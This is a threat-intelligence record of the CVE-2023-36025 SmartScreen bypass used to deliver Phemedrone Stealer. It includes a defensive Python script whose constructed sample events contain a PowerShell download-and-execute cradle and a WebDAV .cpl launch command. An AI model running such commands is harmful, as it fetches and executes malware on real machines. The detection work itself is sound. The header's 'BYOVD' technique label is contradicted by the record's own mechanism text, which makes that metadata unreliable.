Bypass Record

BYOVD (Vulnerable Driver) × Microsoft Windows Defender SmartScreen

A publicly-reported instance of BYOVD (Vulnerable Driver) bypassing Microsoft Windows Defender SmartScreen, recorded with its original source. Factual record; no assessment of any specific deployment.

Product
Microsoft Windows Defender SmartScreen
Technique
BYOVD (Vulnerable Driver)
MITRE ATT&CK
T1562.001
Confidence
High
Severity
High
Status
in the wild
Disclosed
2024-01-12
Config / version noted
Not stated

Provenance

Reported as

Exploitation of CVE-2023-36025, a Windows Defender SmartScreen security-feature bypass, to deliver malware: attackers use crafted .url files to evade SmartScreen warnings.

Mechanism

Crafted Internet Shortcut (.url) files slip past Windows Defender SmartScreen prompts because unpatched SmartScreen does not properly validate them (CVE-2023-36025), so the usual warning for content from an untrusted source is never shown. When the .url file is opened, it retrieves a malicious .cpl file and executes it via control.exe, which in turn invokes rundll32.exe to run a DLL loader. The loader fetches further PowerShell stages from GitHub and ultimately deploys the Phemedrone Stealer payload through DLL sideloading, with scheduled tasks providing persistence. Note that no kernel driver is loaded anywhere in the reported chain: the bypass lies in SmartScreen's handling of .url files, not in a vulnerable driver.

Detection & mitigation

Monitor for Internet Shortcut (.url) files opened from untrusted sources, in particular ones that cause control.exe to launch a .cpl from a network share or user-writable path (with rundll32.exe spawned beneath it). Detect the subsequent PowerShell download cradles and the DLL sideload, e.g. WerFaultSecure.exe loading an unsigned wer.dll from outside System32. Apply the November 2023 security update that fixes CVE-2023-36025, and enforce SmartScreen through Group Policy (warn and prevent bypass) so users cannot click through it.
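The detection points above, turned into rules that run over process-creation and image-load telemetry. This is an added example, not code from the cited report or from any vendor product; the events it consumes are constructed Sysmon-style records (Event ID 1 for process create, Event ID 7 for image load) written to exercise the rules, and the UNC host, GitHub repository path and user name in them are placeholders. Real telemetry would be fed in as the same dict shape.

```python
"""Detection rules for the reported .url -> control.exe -> rundll32 ->
PowerShell -> DLL-sideload chain.  Added example; not code from the cited
report.  Events are constructed Sysmon-style records (EventID 1 = process
create, EventID 7 = image load), not real telemetry.  Field names follow
Sysmon; the rules assume that shape."""
import ntpath
import re

# Constructed sample telemetry (not real logs).  Host, repo and user are placeholders.
SAMPLE_EVENTS = [
    # 1. Opening the crafted .url makes control.exe fetch a .cpl from a WebDAV share.
    {"EventID": 1, "Image": r"C:\Windows\System32\control.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" "\\203.0.113.10@80\share\payload.cpl",'},
    # 2. control.exe hands the .cpl to rundll32.exe through Shell32's Control_RunDLL.
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "\\203.0.113.10@80\share\payload.cpl",'},
    # 3. The DLL loader pulls the next stage with a PowerShell download cradle.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/example/repo/main/stage2.txt')\""},
    # 4. Sideload: a copied WerFaultSecure.exe loads an unsigned wer.dll from a user path.
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Roaming\WerFaultSecure.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Roaming\wer.dll",
     "Signed": "false", "Signature": ""},
    # 5. Benign: control.exe opening a built-in applet from System32.
    {"EventID": 1, "Image": r"C:\Windows\System32\control.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" C:\Windows\System32\timedate.cpl'},
    # 6. Benign: the real WerFaultSecure.exe loading the signed wer.dll from System32.
    {"EventID": 7, "Image": r"C:\Windows\System32\WerFaultSecure.exe",
     "ImageLoaded": r"C:\Windows\System32\wer.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]

SYSTEM32 = "c:\\windows\\system32\\"
CPL_RE = re.compile(r"\.cpl\b", re.I)
# UNC/WebDAV targets (\\host\...) or user-writable directories: a .cpl from
# these is the abnormal case; System32 applets are the normal one.
NONSYSTEM_PATH_RE = re.compile(r"\\\\[^\s\"]+|\\Users\\|\\Temp\\|\\AppData\\", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
                       r"|Net\.WebClient|Invoke-Expression|\bIEX\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def _basename(path):
    # ntpath handles Windows separators regardless of the host OS.
    return ntpath.basename(path or "").lower()


def rule_control_cpl(ev):
    """control.exe launching a .cpl that does not live under System32."""
    cmd = ev.get("CommandLine", "")
    if (ev.get("EventID") == 1 and _basename(ev.get("Image")) == "control.exe"
            and CPL_RE.search(cmd) and NONSYSTEM_PATH_RE.search(cmd)):
        return {"rule": "control_cpl_nonsystem", "evidence": cmd}
    return None


def rule_rundll32_cpl(ev):
    """rundll32.exe spawned by control.exe to run a .cpl from outside System32."""
    cmd = ev.get("CommandLine", "")
    if (ev.get("EventID") == 1 and _basename(ev.get("Image")) == "rundll32.exe"
            and _basename(ev.get("ParentImage")) == "control.exe"
            and CPL_RE.search(cmd) and NONSYSTEM_PATH_RE.search(cmd)):
        return {"rule": "rundll32_control_rundll_nonsystem", "evidence": cmd}
    return None


def rule_ps_cradle(ev):
    """PowerShell with a download-and-execute cradle; report the URLs it references."""
    cmd = ev.get("CommandLine", "")
    if (ev.get("EventID") == 1 and _basename(ev.get("Image")) in ("powershell.exe", "pwsh.exe")
            and CRADLE_RE.search(cmd)):
        return {"rule": "powershell_download_cradle", "evidence": URL_RE.findall(cmd) or [cmd]}
    return None


def rule_werfault_sideload(ev):
    """WerFaultSecure.exe loading a wer.dll that is unsigned or outside System32."""
    if ev.get("EventID") != 7 or _basename(ev.get("Image")) != "werfaultsecure.exe":
        return None
    loaded = ev.get("ImageLoaded", "")
    if _basename(loaded) != "wer.dll":
        return None
    unsigned = ev.get("Signed", "").lower() != "true"
    outside = not loaded.lower().startswith(SYSTEM32)
    if unsigned or outside:
        return {"rule": "werfaultsecure_sideload", "evidence": loaded}
    return None


RULES = (rule_control_cpl, rule_rundll32_cpl, rule_ps_cradle, rule_werfault_sideload)


def detect(events):
    """Run every rule over every event; alerts come back in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hit["image"] = ev.get("Image")
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], "->", alert["evidence"])
```

The two benign records are there on purpose: control.exe launching a System32 applet and the genuine WerFaultSecure.exe loading the signed wer.dll from System32 produce no alert, which is the false-positive check a rule like this needs before it goes near production telemetry. The sideload rule keys on both signature state and load path because an attacker can only control the second one by copying the binary somewhere writable.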


This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.